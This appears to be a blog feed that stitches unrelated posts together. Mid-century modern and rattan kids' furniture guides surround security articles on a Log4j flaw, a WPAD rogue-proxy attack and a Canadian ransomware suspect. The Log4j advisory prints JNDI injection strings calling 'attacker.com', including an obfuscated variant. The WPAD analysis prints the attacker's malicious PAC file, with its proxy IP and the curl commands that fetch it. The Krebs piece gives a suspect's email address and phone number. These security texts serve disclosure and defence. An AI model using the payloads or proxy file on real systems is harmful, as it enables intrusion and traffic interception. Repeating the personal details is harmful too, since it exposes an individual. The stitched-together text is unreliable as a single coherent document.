Mid-Century Modern Furniture For Kids’ Room

/0 Comments/in /by

Mid-century modern (MCM) style has always fascinated people worldwide. This is probably because of its unique functionality, combined with simple shapes and neat design details. As for kids’ rooms, there are plenty of options to decorate them in this unique style. All you need is to choose the right furniture pieces.

There are plenty of great mid-century modern options on the market, but we suggest going for pieces that are both stylish and functional. We have picked out some of our favorite pieces to help you create a stylish and comfortable kids’ room.

The best kids’ mid-century furniture

There are many of the fantastic mid-century modern kids’ furniture available on the market. We have compiled a list of the best pieces to help you get started.

Kids’ mid century chair

One of our favorite pieces of furniture for kids’ rooms is the mid-century modern chair. These chairs for kids come in various shapes and sizes, but they all have one common feature – simplicity. This makes them perfect for any type of room, and they will easily complement the overall design.

IKARE Wooden Natural Baby High Chair

If you are looking for a stylish and functional high chair, we suggest going for the IKARE Wooden Natural Baby High Chair. This chair is perfect for kids aged 6 months and up, and it features a beautiful mid-century modern design. It is made of natural wood, which makes it both sturdy and stylish, and it will easily blend in with any room decor.

This mid-century modern high chair is designed to match right up to your dining table so that your infant may eat, play with toys, learn, and grow alongside you. Because the footplate is height-adjustable and the food tray can be removed, you may adjust the high chair when your child grows. This high chair includes a full-size high chair, a booster seat, and a toddler chair in one! With three must-have baby seats in one, this high chair has it all!

IKARE Wooden Natural Baby High Chair is constructed of beech hardwood that is durable, shock-absorbent, and shock-resistant. It includes a PP seat design that helps to enhance comfort and fatigue resistance. Comfort, balance, and ergonomics are all improved by solid construction. Your baby’s safety is most important, after all! The chair includes a 5-point safety harness system with shoulder pads and a crotch strap to offer the safest seating for your child.

KidKraft Mid-Century Kid Upholstered Reading Chair & Ottoman with Storage

Another great piece that we suggest for your kid’s room is the KidKraft Mid-Century Kid Upholstered Reading Chair and Ottoman with Storage. This kids’ reading chair features a vintage mid-century classic style, and it will quickly bring some class to your kids’ room decor. It is also very comfortable, which means that your child will be able to relax and read in style.

The chair also comes with an ottoman, which can be used as a storage unit. This is a great feature, as it will help you keep the room neat and organized. The ottoman is also very comfortable, and it will be perfect for your child to relax on.

The KidKraft Mid-Century Kid Upholstered Reading Chair and Ottoman with Storage is made of wood, making it both strong and durable. The chair is upholstered in a soft fabric, which will make it very comfortable for your child.

DIAOD Mid-Century Modern Footstool

This adorable little footstool is perfect for any kids’ room. It features a mid-century modern design, easily matching most room decor styles. It is also very comfortable, which means that your child will love to use it while playing or watching TV.

This footstool is made of plywood and fabric, so it is both lightweight and sturdy. It is effortless to move around, but it won’t be easily tipped over. The DIAOD Mid-Century Modern Footstool comes in a variety of stylish colors, so you will surely find one that matches your child’s room decor.

Christopher Knight Home Evelyn Mid Century Modern Fabric Arm Chair

With its beautiful vintage design, this armchair is a must-have for fans of the classic style. This comfy choice boasts four sturdy walnut legs, adding to the appeal of this elegant chair. The easy-to-clean fabric is perfect for busy households, and the high-density foam provides hours of relaxation.

The Evelyn Mid Century Modern Fabric Arm Chair would look great in any room and would make a perfect place for your child to relax with a good book or watch TV. The chair is also very comfortable, so your child will be able to enjoy it for hours on end.

KidKraft Mid-Century Kid Wooden Corner Reading Nook

This KidKraft Mid-Century Kid Wooden Corner Reading Nook is perfect for any kid who loves to read. It features an adorable design with adjustable shelves, making it easy to customize the nook according to your child’s needs.

Your child will love spending their time in this corner reading nook! The high back and soft cushions will make it a very comfortable place to relax. The nook is also very spacious, so your child will have plenty of room to spread out.

The product is very versatile, as it would work perfectly in any bedroom. It will help to keep your child’s room organized and neat.

AOKAEII High Back Rocker Chair & Ottoman

A staple piece in a nursery! This chair is perfect for mothers and fathers to read to their children, nurse them or just spend some quality time together. The AOKAEII High Back Rocker Chair & Ottoman is a stylish and comfortable choice that easily complements any nursery decor.

The sturdy solid rubberwood base construction gives stability when rocking. When you sit down, you feel as if you’re lying down naturally. The glider rocker has a footrest, which adds to the chair’s stability. This chair can bear up to 300 pounds.

The AOKAEII High Back Rocker Chair & Ottoman are made of the best quality materials: the 40-density high-elastic sponge is thicker and more resilient than other sponges. It’s worn with soft, high-quality linen fabrics that are both delicate and robust. It has a cushiony, wear-resistant feel and is skin-friendly and easy to maintain.

Kids’ activity tables and desks in mid-century modern style

If your kid loves to draw, color, and do other types of arts & crafts activities, a kids’ activity table is an essential piece of furniture. A good activity table should be very sturdy and durable so that it can withstand hours of use.

Milliard Kids Mid Century Modern Table and Chair Set Wooden with Storage Baskets

This great kids’ activity table is a fantastic choice for home and school use. It boasts two large storage baskets, which will help to keep your child’s room neat and organized at all times.

This table and chairs set are ideal for coloring, tea parties, car races, and so much more because it is the perfect size for young ones. This collection boasts a white and brown mid-century modern design that is appropriate in any house room.

The sturdy construction of this activity table, which is made out of Pine and MDF wood, makes it ideal for children to use. The table and chairs have been subjected to independent tests by an independent consumer organization for strength and safety.

Wildkin Kids Modern Study Desk with Storage and Stool

With Wildkin’s children’s desk and chair set, cater to your child’s creative side! This kids’ table and chair set is sized just right for small children looking for somewhere to let their imaginations run wild. This sturdy and sleek design makes this a great addition to bedrooms, playrooms, or living rooms.

Wildkin’s table and chairs for little ones include a storage area beneath for the child’s books, pencils, and other supplies. The desk table’s stain-resistant melamine top and tough natural wood legs guarantee that Wildkin’s desk for kids with storage and desk stool set will withstand any little artist. This desk and stool’s classic, timeless solid wood legs are both durable and safe for the kids.

Mid-century modern storage solutions for kids

Finally, we suggest that you don’t forget about toys and storage solutions. For example, an elegant wooden toy box with a sleek design would be a great option. This way, you can keep all of your precious items organized while providing an attractive storage unit for your children’s toys at the same time.

KidKraft Mid-Century Kid Bin Storage Unit

Storage units in mid-century modern style are surprisingly challenging to find. That’s why we were so happy to discover this stylish bin storage unit by KidKraft. It can be used in any part of the house, but it is ideal for bedrooms and playrooms.

The KidKraft Mid-Century Kid Bin Storage Unit is made of sturdy wood construction and a beautiful white and grey finish. It has two large bins that are perfect for storing toys, clothes, books, and other items. The bins are also removable so that they can be easily cleaned. The top of this storage unit features two open regions ideal for storing toys you want to be easily accessible.

The popular mid-century modern design style is represented by the clean lines, rounded feet, and geometric pattern on the back wall. Get the toy organization you need and the style you crave with this KidKraft storage unit.

The origins of Mid-Century Modern

Mid-century modern design was born out of the cultural zeitgeist after World War II. According to James A. Bier, Ph.D., Curator at the Smithsonian’s National Museum of American History, Americans were “reflecting on what they had done…through the creation of this weapon.” As a result, many designers began to focus on new ways to improve daily life and make it more comfortable.

One of the most iconic aspects of mid-century modern design is its organic shapes and natural materials. This was a reaction against the stark, angular lines of Art Deco and the over-the-top luxury of the previous era. Mid-century designers favored simple forms and minimal ornamentation, resulting in sleek furniture that was as comfortable as it was stylish.

Mid-century modern also focused on creating designs with a sense of lightness and balance, no matter how outlandish the shapes became. According to Bier, this style “is really about removing barriers between people and objects.” Many homeowners found they could combine pieces from different manufacturers and still have a cohesive look.

Mid-century modern was not just a design style but an entire way of life. It embraced both the city and the country, emphasizing simple living with access to modern conveniences like dishwashers, TVs, and garage doors. This generation popularized vibrant colors because they wanted to bring happiness and brightness into their homes.

If you’re looking to add a touch of mid-century modern to your home, start by incorporating natural materials like wood, metal, and glass. Keep the lines simple and avoid excessive ornamentation. Colors should be light and bright, emphasizing cool neutrals and pastels. And finally, keep an eye out for furniture pieces that are sleek, streamlined, and comfortable.

Mid-century modern designs also had a certain uniformity because of the post-war mentality “Good design was democratic” stated by George Nelson in 1976. Although there was never a clearly defined set of standards for mid-century modern homes, most houses built during this era shared similar characteristics, such as large expanses of glass, open floor plans, and a connection to the outdoors.

As we move further into the 21st century, mid-century modern design is becoming more popular than ever. If you’re looking for a way to add some timeless style to your home, look no further than mid-century modern.

Is Mid-Century Modern still in style?

Yes! Mid-century modern design is more popular than ever and shows no signs of slowing down. Mid-century modern is timeless and elegant, making it an excellent choice for those who want their home to be stylish as well as functional.

Mid-century furniture designs are a massive inspiration for interior designers because of the wide range of pieces available and the simplicity of the line. Mid-century modular sofas allow many homeowners to create their dream living room with the perfect seating arrangement.

Mid-century modern also offers homeowners a wide range of design possibilities, from sleek and simple to bold and dynamic. There’s no “one size fits all” approach to mid-century decor.

Is Mid-Century Modern furniture expensive?

No! Although some mid-century modern pieces are rare or one-of-a-kind antiques, many affordable reproductions can be found in furniture stores and online. You don’t have to spend a fortune to add some mid-century style to your home.

What are the Advantages and Disadvantages of Mid-Century Modern Design?

Mid-century modern has many advantages that continue to make it popular today. First of all, the clean, modern lines are easy to maintain, making it a great choice for homeowners who want stylish furniture but don’t require much upkeep. Mid-century modern also has a classic feel to it, which never goes out of style.

Mid-century design is focused on creating sleek and functional furniture while being comfortable at the same time. This means that many of the pieces are versatile and can be used in various settings.

However, one disadvantage of mid-century modern design is that it can be difficult to find unique pieces. Since the style is so popular, many iconic designs have been reproduced multiple times. So, if you’re looking for something truly one-of-a-kind, you may have to search harder (and for a much higher price).

The post Mid-Century Modern Furniture For Kids’ Room appeared first on Comfy Bummy.

The Good, the Bad and the Ugly in Cybersecurity – Week 50

/0 Comments/in /by

The Good

This week we have another law enforcement victory to highlight. The grand jury indictment (in USA and Canada) of Mathew Philbert was the result of “Project CODA”, a joint operation between Europol, the FBI, and Canada’s Ontario Provincial Police (O.P.P.). Project CODA began in early 2020 after the FBI contacted Canadian law enforcement for help with an investigation into various ransomware attacks on U.S. businesses originating in Canada.

Philbert, described as one of Canada’s “most prolific cybercriminals’, was formally charged in connection with numerous claims of fraud and cyber crime, including ransomware attacks and bot operation. The indictment covers multiple counts from the 2018 timeframe, though the individual is allegedly tied to a host of other attacks dating back many years. Authorities also seized a plethora of laptops, phones, drives, carding blanks, and crypto-wallet metadata that assist in tying Philbert to the crimes.

Philbert was notoriously one of the original Darkode forum members back in 2009, as well as being active on many other established underground forums and markets. He has also been tied to the operation of at least one Mariposa-based botnet. Perhaps the most eye-opening aspect of the charges is the clear indication that Philbert was attacking medical facilities during the alleged time.

“On or about April 28, 2018, within the District of Alaska and elsewhere, the defendant, MATTHEW PHILBERT, knowingly caused and attempted to cause the transmission of a program, information, code, and command, and, as a result of such conduct, intentionally caused and attempted to cause damage without authorization to a protected computer owned by the State of Alaska, and the offense caused and would, if completed, have caused: (a) the modification, impairment, and potential modification and impairment of the medical examination, diagnosis, treatment and care of 1 or more individuals; (b) a threat to public health and safety; and, (c) damage affecting 10 or more protected computers during a 1-year period.”

While the events in question predate the current global situation, any attack on a medical entity is reprehensible, so we have one more victory for global law enforcement to cheer and one less prolific criminal off the grid. Hooray!

The Bad

This was a rough week for the retail industry with regard to ransomware attacks. North of 300 outlets of the SPAR supermarket chain were affected by an apparent ransomware incident. As a result of the attack, many locations were forced to close, while others had to resort to processing transactions on paper.

A SPAR spokesperson stated that the attack was:

“impacting stores’ ability to process card payments meaning that a number of SPAR stores are currently closed to shoppers or are taking only cash payments.”

At the time of writing, there is no clear indication of the ransomware family involved, nor is there any detail on the payment status of the ransom.

A similar scenario played out at The Delta-Montrose Electric Association (DMEA). The member-owned electric cooperative in Colorado has also revealed they were the subject of a breach, including the use of “file-encrypting malware”. At the time, the attack led to nearly 90% of their internal systems being out or affected in a negative way. As with the SPAR situation, there is currently no confirmed data on which ransomware family was involved.

Both victims are on the road to recovery, but these attacks serve as a reminder of the importance of prevention when it comes to ransomware.

The Ugly

Life in Russia became much more difficult for TOR users this week. On December 1, Russia’s Roskomnadzor (aka the Federal Service for Supervision of Communications, Information Technology, and Mass Media) started blocking traffic on TOR nodes. That was followed this week by a block on access to TOR’s main site.

Attempting to explain the reasons for the action, a spokesperson for Roskomnadzor said:

“The grounds were the spreading of information on the site ensuring the work of services that provide access to illegal content…Today, access to the resource has been restricted.”

The country’s crackdown on Tor is just the latest in a wave of censorships over the last few months that have seen Apple forced to turn off its Private Relay service, Opera to remove its browser’s VPN and ten other VPNs being blocked. In response to the latest action, the TOR team have created a website mirror which can be persistently accessed, even by citizens in Russia.

Meanwhile, a non-amateur level and persistent group threat actor has been running thousands of TOR relays for at least four years in what looks like a systematic Sybil attack, essentialy an attempt to deanonymize TOR traffic or collect information on users to map their routes through the network.

It is estimated that, at one point, as much as 10% of the TOR network could have been under the control of a single entity. All the identified servers have been removed, but researchers believe the effort is ongoing and are actively hunting for more suspicious relays.

CVE-2021-44228: Staying Secure – Apache Log4j Vulnerability

/0 Comments/in /by

Executive Summary

  • A new critical remote code execution vulnerability in Apache Log4j2, a Java-based logging tool, is being tracked as CVE-2021-44228.
  • Exploit proof-of-concept code is widely available and internet wide scanning suggests active exploitation.
  • At the time of writing, exploit attempts lead to commodity cryptominer payloads. SentinelOne expects further opportunistic abuse by a wide variety of attackers, including ransomware and nation-state actors.
  • Major services and applications globally are impacted by the vulnerability due to the prevalence of Log4j2s use in many web apps.
  • Due to the ease and rate of exploitation attempts, SentinelOne recommends upgrading impacted services to the latest version of Log4j2.

Background

On December 9th, 2021, the security community became aware of active exploitation attempts of a vulnerability in Apache Log4j 2. The vulnerability in question is trivially easy to exploit and consists of a malformed Java Naming and Directory Interface (JNDI) request of the form ‘${jndi:ldap://attacker.com/file}` (further variations are documented below). It’s difficult to assess the extent of possible impact as Log4j2 is used across a variety of products and services, from Apache products like Struts, Solr, and Flink to security products like ElasticSearch, Logstash, and Kafka, and even Minecraft servers. Defenders are encouraged to update any explicit uses of Log4j 2 to version 2.15.0-rc2 or higher, as well as scrutinize other services that may implicitly rely on it.

As described in the NVD vulnerability disclosure, JNDI features do not protect against requests pointing to attacker-controlled endpoints including LDAP(s), DNS, and RMI requests. The requests poll an attacker endpoint for a file that’s then executed in the context of the Log4j 2 service.

Examples:

${jndi:ldap:///}  

${jndi:dns:///} 

${jndi:ldap://${env:}./}

Further variants of the malicious request have been publicly reported and include slight obfuscation with nested functions like ${lower:} as follows:

${jndi:${lower:l}${lower:d}ap:///}

At the time of writing, payloads include cryptominers like Golang-based Kinsing ELF payloads but there’s nothing limiting the potential for abuse as attackers ramp up their infrastructure and tooling to take advantage of this exploitation opportunity.

SentinelOne is actively monitoring the situation and collaborating with industry partners to improve the collective defense of all internet users.

Mitigation Guidance

  • Upgrade log4j 2 to the latest version, specifically log4j-2.15.0-rc2 or newer.
  • According to Apache’s guidance, in releases >=2.10, this behavior can be mitigated by setting either the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true. For releases from 2.0-beta9 to 2.10.0, the mitigation is to remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class.

Additional Resources

In-the-Wild WPAD Attack | How Threat Actors Abused Flawed Protocol For Years

/0 Comments/in /by

A Guest Post By Daniel Persch, QGroup GmbH, Frankfurt am Main

The possibility of leveraging the Web Proxy Auto-Discovery (WPAD) protocol to conduct MITM (Man-in-the-Middle) attacks has been known for many years and has been described previously. However, until now, there was no known case of it occurring in-the-wild. In this post, we disclose details of such an ITW attack discovered by our incident response specialists at QGroup GmbH, Germany, who successfully investigated and mitigated the attack with the help of the SentinelOne platform.

What is WPAD?

Web Proxy Auto Discovery is a protocol used to ensure all devices on a network use the same web proxy configuration. Rather than having to manually configure each device, network administrators may use WPAD to ease the process. When enabled, WPAD searches for a Proxy Auto-Configuration (PAC) file and applies the configuration automatically.

On a typical router, a default DHCP server is configured to enable easy client connectivity. This DHCP server includes a default domain suffix (for example: example.com) which will be assigned to the clients. Clients within the network retrieve that domain name when connecting via cable or WI-FI to that network together with the IP address from the DHCP server.

After retrieving an IP address and domain suffix via DHCP from a router, if WPAD is enabled and no WPAD URL is explicitly specified by the DHCP server, the OS tries the following URLs to retrieve appropriate proxy settings for the connection:

http://wpad.department.branch.example.com/wpad.dat 
http://wpad.branch.example.com/wpad.dat
http://wpad.example.com/wpad.dat
http://wpad/wpad.dat

The is replaced by the domain suffix assigned by the DHCP server. If a publicly reachable fully-qualified domain name (FQDN) is used, the URL will be requested from the internet accordingly. If an attacker owns the domain that is used by the internal router and the client has WPAD enabled, the attacker can redirect the traffic of internet applications using system proxy settings through the attacker’s proxy.

All the attacker needs to do is to provide a correct PAC file at one of the locations mentioned above, and the client OS will use the configuration on-the-fly without any user interaction.

WPAD Attack Details

We discovered a case where this weakness appears to have been abused for at least three years and is redirecting the internet traffic of users around the world through the attacker’s proxy.

Although more domains could be affected the following analysis is linked to the following domain name:

domain.name

The attacker registered the publicly reachable FQDN and set up a server at wpad.domain.name, hosting a web server on the default TCP-Port 80.

The name was likely chosen in light of the fact that on some home routers, the default DNS domain setting is “domain.name”. The expansion of Top Level Domain names in recent years has made it possible to register domains with the .name TLD, so what may have once been a safe default choice has become subject to a WPAD Name Collision Vulnerability.

In the attack we discovered, the source IP of the victim seems to determine whether the server answers with an empty response or with a WPAD Proxy Auto-Configuration file. An empty response was received when we tried the following command from a German Telekom Address.

$ curl http://wpad.domain.name/wpad.dat

However, when performed using a VPN provider with outgoing IP originating in Malaysia, we received the following PAC file:

$ curl http://wpad.domain.name/wpad.dat 
function FindProxyForURL(url, host) {

	if (isPlainHostName(host) || 
		dnsDomainIs(host, ".windowsupdate.com") || 
		dnsDomainIs(host, ".microsoft.com") || 
		dnsDomainIs(host, ".baidu.com") ||
		dnsDomainIs(host, ".kaspersky.com") || 
		dnsDomainIs(host, ".axaltacs.net") || 
		dnsDomainIs(host, ".live.com") || 
		dnsDomainIs(host, ".drivergenius.com") ||
			isInNet(host, "10.0.0.0", "255.0.0.0") || 
			isInNet(host, "172.16.0.0", "255.255.224.0") || 
			isInNet(host, "192.168.0.0", "255.255.0.0") || 
			isInNet(host, "127.0.0.0", "255.0.0.0"))
		return "DIRECT"; 
	else
		return 'PROXY 185.38.111.1:8080';
}

What we can see here is that the PAC file instructs the client to use the proxy server at the following address:

185.38.111.1:8080

for all addresses except RFC1918, localhost and the following domains:

baidu.com
kaspersky.com
live.com
microsoft.com
windowsupdate.com
axaltacs.net
drivergenius.com

In other versions of this PAC file (see IoCs below), we have also seen the following lines added to the exclusions:

dnsDomainIs(host, ".googlevideo.com")
dnsDomainIs(host, ".youtube.com")

and

dnsDomainIs(host, ".dhl.com")

At the time of our investigation, the embedded IP address was providing an http-proxy over TCP and port 8080.

When using the PAC file with Firefox, we could successfully establish a connection using the proxy specified:


According to VirusTotal, the IP address, 185.38.111.1:8080, is referred to by various known malware files:

The wpad.dat PAC files containing this specific IP proxy address also have a history of being served up by a number of other known malicious sites including

  • stoppblock[.]net/wpad.dat
  • stoppblock[.]org/wpad.dat
  • stoppblock[.]com/wpad.dat
  • access-unstop[.]info/wpad.dat
  • accessquick[.]net/wpad.dat
SHA1: acf3275189948f095f122289d2d6ef44be6ccc4d

Many of these sites are tagged as “known infection source”, “proxy avoidance” and “malware repository, spyware and malware”.

Impact and Recommendations

While this MITM attack via rogue-proxy appears to have been in use for several years, the fact that most web traffic these days is secured with TLS means attackers need to generate certificates that the web browser would trust before they could inspect or redirect interesting traffic.

Some web sites, on the first visit, respond with an HSTS (Strict Transport Security) header that lets the browser know all future requests should always be made over TLS, thus preventing SSL Stripping attacks, a means of forcing an encrypted HTTPS connection to downgrade to insecure HTTP. According to recent data, however, only about 22% of sites are currently using HSTS. Traffic that is neither TLS or HSTS-protected is vulnerable to MITM attacks, and downloads over HTTP are particularly vulnerable to interception by such a rogue-proxy.

For enterprise, it’s likely the domain suffix returned by DHCP while at the office will be a domain whose DNS is controlled by the company, so it would be difficult for an attacker to add a rogue WPAD DNS entry. More commonly, home or public routers using the default “wpad.domain.name” or any other generic TLD (gTLD) name that is subject to a domain name collision could be vulnerable to such a MITM attack.

It is worth noting that in Windows 10, WPAD is enabled by default. In macOS and Linux, this setting is available but disabled by default.

Best practices for protecting against the wider WPAD Name Collision Vulnerability are outlined in this US-CERT advisory and include:

  • Consider disabling automatic proxy discovery/configuration in browsers and operating systems unless those systems will only be used on internal networks.
  • Consider using a registered and fully qualified domain name (FQDN) from global DNS as the root for enterprise and other internal namespace.
  • Consider using an internal TLD that is under your control and restricted from registration with the gTLD program.
  • Configure internal DNS servers to respond authoritatively to internal TLD queries.
  • Configure firewalls and proxies to log and block outbound requests for wpad.dat files.
  • Identify expected WPAD network traffic and monitor the public namespace or consider registering domains defensively to avoid future name collisions.

In our investigation, we were able to search for the malicious IP across all our SentinelOne instances to find a number of affected parties. Our strategic integration of SentinelOne into our security operations processes (SecOps, IR, Analytics) enabled a rapid reaction and allowed us to both immediately protect all of our customers and ad hoc identify which customers had been affected.

Conclusion

The flaws inherent in WPAD have received plenty of attention from security researchers, leading one to suggest renaming it “badWPAD” because the risks it presents stem directly from its design, rather than any faulty configuration or implementation on the network administrator’s side.

Now we know that threat actors have been paying attention, too. Combining malicious PAC files with selective domain name registrations, they have been able to compromise the traffic of internet users for years. Despite various network safeguards such as TLS and HSTS, and software download safeguards such as digital signature verification, there is still plenty of scope for malicious actors to attack unwary organizations and end users via WPAD and unencrypted traffic.

In particular, because home routers with default settings are the most affected, the trend towards remote work and Work From Home caused by the COVID-19 pandemic poses a particular risk given the rise of endpoints outside the protection of the office LAN.

With the evidence presented here of in-the-wild WPAD attacks, those risks must be mitigated by administrators by attending to the recommendations above and ensuring that they have full visibility into network traffic via a modern EDR or XDR platform.

Indicators of Compromise

SHA1 PAC files
acf3275189948f095f122289d2d6ef44be6ccc4d
6e515b52e1726a5a29de137bde03719c0a3daee9
01cb0fe80a03ecbac16f9b98fcaf0b3fce2b6b21

Observed DNS
wpad.domain[.]name
*.domain[.]name
wpad*

IP addresses
185[.]38.111.1
185[.]38.111.4
185[.]38.111.5
185[.]38.111.0/24

Canada Charges Its “Most Prolific Cybercriminal”

/0 Comments/in /by

A 31-year-old Canadian man has been arrested and charged with fraud in connection with numerous ransomware attacks against businesses, government agencies and private citizens throughout Canada and the United States. Canadian authorities describe him as “the most prolific cybercriminal we’ve identified in Canada,” but so far they’ve released few other details about the investigation or the defendant. Helpfully, an email address and nickname apparently connected to the accused offer some additional clues.

Matthew Philbert, in 2016.

Matthew Philbert of Ottawa, Ontario was charged with fraud and conspiracy in a joint law enforcement action by Canadian and U.S. authorities dubbed “Project CODA.” The Ontario Provincial Police (OPP) on Tuesday said the investigation began in January 2020 when the U.S. Federal Bureau of Investigation (FBI) contacted them regarding ransomware attacks that were based in Canada.

“During the course of this investigation, OPP investigators determined an individual was responsible for numerous ransomware attacks affecting businesses, government agencies and private individuals throughout Canada as well as cyber-related offenses in the United States,” reads an OPP statement.

“A quantity of evidentiary materials was seized and held for investigation, including desktop and laptop computers, a tablet, several hard drives, cellphones, a Bitcoin seed phrase and a quantity of blank cards with magnetic stripes,” the statement continues.

The U.S. indictment of Philbert (PDF) is unusually sparse, but it does charge him with conspiracy, suggesting the defendant was part of a group. In an interview with KrebsOnSecurity, OPP Detective Inspector Matt Watson declined to say whether other defendants were being sought in connection with the investigation, but said the inquiry is ongoing.

“I will say this, Philbert is the most prolific cybercriminal we’ve identified to date in Canada,” Watson said. “We’ve identified in excess of a thousand of his victims. And a lot of these were small businesses that were just holding on by their fingernails during COVID.”

A DARK CLOUD

There is a now-dormant Myspace account for a Matthew Philbert from Orleans, a suburb of Ottawa, Ontario. The information tied to the Myspace account matches the age and town of the defendant. The Myspace account was registered under the nickname “Darkcloudowner,” and to the email address dark_cl0ud6@hotmail.com.

A search in DomainTools on that email address reveals multiple domains registered to a Matthew Philbert and to the Ottawa phone number 6138999251 [DomainTools is a frequent advertiser on this site]. That same phone number is tied to a Facebook account for a 31-year-old Matthew Philbert from Orleans, who describes himself as a self-employed “broke bitcoin baron.”

Mr. Philbert did not respond to multiple requests for comment.

According to cyber intelligence firm Intel 471, that dark_cl0ud6@hotmail.com address has been used in conjunction with the handle “DCReavers2” to register user accounts on a half-dozen English-language cybercrime forums since 2008, including Hackforums, Blackhatworld, and Ghostmarket.

Perhaps the earliest and most important cybercrime forum DCReavers2 frequented was Darkode, where he was among the first two-dozen members. Darkode was taken down in 2015 as part of an FBI investigation sting operation, but screenshots of the community saved by this author show that DCReavers2 was already well known to the Darkode founders when his membership to the forum was accepted in May 2009.

DCReavers2 was just the 22nd account to register on the Darkode cybercrime forum.

Most of DCReavers’s posts on Darkode appear to have been removed by forum administrators early on (likely at DCReavers’ request), but the handful of posts that survived the purge show that more than a decade ago DCReavers2 was involved in running botnets, or large collections of hacked computers.

“My exploit pack is hosted there with 0 problems,” DCReaver2 says of a shady online provider that another member asked about in May 2010.

Searching the Web on “DCreavers2” brings up a fascinating chat conversation allegedly between DCReavers2 and an individual in Australia who was selling access to an “exploit kit,” commercial crimeware designed to be stitched into hacked or malicious sites and exploit a variety of Web-browser vulnerabilities for the purposes of installing malware of the customer’s choosing.

In that 2009 chat, indexed by the researchers behind the website exposedbotnets.com, DCReavers2 uses the Dark_Cl0ud6 email address and actually shares his real name as Matthew Philbert. DCReavers2 also says his partner uses the nickname “The Rogue,” which corresponds to a former Darkode administrator who was the second user ever registered on the forum (see screenshot above).

In that same conversation, DCReavers2 discusses managing a botnet built on ButterFly Bot. Also known as “Mariposa,” ButterFly was a plug-and-play malware strain that allowed even the most novice of would-be cybercriminals to set up a global operation capable of harvesting data from thousands of infected PCs, and using the enslaved systems for crippling attacks on Web sites. The ButterFly Bot kit sold for prices ranging from $500 to $2,000.

An advertisement for the ButterFly Bot.

The author of ButterFly Bot — Slovenian hacker Matjaz “Iserdo” Skorjanc — was Darkode’s original founder back in 2008. Arrested in 2010, Skorjanc was sentenced to nearly five years in prison for selling and supporting Mariposa, which was used to compromise millions of Microsoft Windows computers.

Upon release from prison, Skorjanc became chief technology officer for NiceHash, a cryptocurrency mining service. In December 2017, $52 million worth of Bitcoin mysteriously disappeared from NiceHash coffers. In October 2019, Skorjanc was arrested in Germany in response to a U.S.-issued international arrest warrant for his extradition.

The indictment (PDF) tied to Skorjanc’s 2019 arrest also names several other alleged founding members of Darkode, including Thomas “Fubar” McCormick, a Massachusetts man who was allegedly one of the last administrators of Darkode. Prosecutors say McCormick also was a reseller of the Mariposa botnet, the ZeuS banking trojan, and a bot malware he allegedly helped create called “Ngrbot.” The U.S. federal prosecution against Skorjanc and McCormick is ongoing.

At the time the FBI dismantled Darkode in 2015, the Justice Department said that out of 800 or so crime forums worldwide, Darkode was the most sophisticated English-language forum, and that it represented “one of the gravest threats to the integrity of data on computers in the United States and around the world.”

Some of Darkode’s core members were either customers or sellers of various “locker” kits, which were basically web-based exploits that would lock the victim’s screen into a webpage spoofing the FBI or Justice Department and warning that victims had been caught accessing child sexual abuse material. Victims who agreed to pay a “fine” of several hundred dollars worth of GreenDot prepaid cards could then be rid of the PC locker program.

A 2012 sales thread on Darkode for Rev Locker.

In many ways, lockers were the precursors to the modern cybercrime scourge we now know as ransomware. The main reason lockers never took off as an existential threat to organizations worldwide was that there is only so much money locker users could reasonably demand via GreenDot cards.

But with the ascendance and broader acceptance of virtual currencies like Bitcoin, suddenly criminal hackers could start demanding millions of dollars from victims. And it stands to reason that a great many Darkode members who were never caught have since transitioned from lockers, exploit kits and GreenDot cards to doing what every other self-respecting cybercrook seems to be involved with these days: Locking entire companies and industries for ransomware payments.

One final observation about the Philbert indictment: It’s good to see the Canadian authorities working closely with the FBI on important cybercrime cases. Indeed, this investigation is remarkable for that fact alone. For years I’ve been wondering aloud why more American cybercriminals don’t just move to Canada, because historically there has been almost no probability that they will ever get caught — let alone prosecuted there. With any luck, this case will be the start of something new.

Kids’ rattan chair – stylish and sustainable addition to your interior

/0 Comments/in /by

Do you fancy beachy, bohemian style? Are you invested in being eco-friendly? If you answered yes, then it’s time to redo your kid’s room and make it look like a little gem. Also, you can make your kid feel even more comfortable in their own room. Even if it’s the baby’s first bedroom, it has to look stylish and cozy at the same time.

So how do you achieve the mission?

First of all, you have to find the perfect kids’ rattan chair for your kid. This piece will instantly bring looks and feelings of the summer season into the room!

Do not be afraid to use bright colors in decorating it. You can paint walls with light blue or pastel green. Then, you just need to add some cute accessories, and you’re done!

Adding a hammock chair to the corner will make the room cozier, and your child can enjoy spending time reading or just taking a nap in it. If there is not enough space for a hammock chair, go for a regular rattan chair.

Rattan furniture is perfect for any kid’s room because it is not only stylish but also eco-friendly. Plus, it is very affordable and easy to clean, which is a bonus!

What is rattan?

Rattan is a natural fiber made from a type of palm tree. It is known for its strength and resistance to wear and tear. Because rattan is a natural fiber, It has been used in Malaysia for over 100 years as traditional furniture.

Rattan is resistant to weather and insects, making it durable for outdoor use. The fibers are woven together to create furniture that is sturdy but also flexible. Rattan can be used without adding harmful chemicals into the environment, making it safe to use in the home.

Rattan chairs are perfect for families that love nature and want their homes to be eco-friendly. It is a versatile material, so if you purchase a rattan chair for your kid, you can also use it for yourself. Why not enjoy some time reading with your child in their new chair?

Where is rattan found?

Rattan can be found in many different countries but is native to Southeast Asia. The rattan palm tree thrives in areas with high humidity and temperatures that don’t fall below 10°C (50°F). As a result, it grows primarily in Indonesia and Malaysia. Other parts of the world, such as Africa, also have rattan trees, but the furniture’s quality is not as good.

How is rattan made?

Rattan is made from the fibers in the rattan palm. The palm tree has large leaves which grow in bunches of six to twelve leaflets, making them look like a feather when they unfurl. The trees can grow 20 meters (65 feet) or more and live for about 25 years.

To make furniture, the bark is removed from the tree and dried in bundles to make rattan strips. These strips can vary in width and length depending on the type of tree and furniture manufacturer. The fibers are soaked in water for 24 to 48 hours before being woven together to create different kinds of furniture, such as chairs, beds, loungers, couches, and tables. One example is rattan chairs, which are often used by kids and adults alike because of their durability and eco-friendly properties.

What is the difference between wicker and rattan?

Wicker is made from the stems of a different type of palm tree, while rattan is made from the fibers in the rattan palm. Rattan is also stronger and more durable than wicker, making it a better choice for furniture. Wicker is often used to make baskets, while rattan can be used to make furniture, flooring, wall paneling, and signs.

Is rattan furniture eco-friendly?

